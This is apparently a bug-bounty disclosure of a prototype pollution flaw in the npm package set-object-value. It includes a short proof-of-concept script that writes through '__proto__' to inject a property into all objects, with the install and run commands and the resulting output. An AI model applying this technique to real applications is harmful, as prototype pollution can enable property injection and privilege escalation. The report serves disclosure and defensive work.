Prototype Pollution in react-atomic/react-atomic-organism

Valid

Reported on

Jan 10th 2021


Description

set-object-value is vulnerable to Prototype Pollution.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var setObjectValue = require("set-object-value")
var obj = {}
console.log("Before : " + {}.polluted);
setObjectValue(obj, ['__proto__','polluted'], 'Yes! Its Polluted');
console.log("After : " + {}.polluted);
  1. Execute the following commands in terminal:
npm i set-object-value # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted

Occurrences

to join this conversation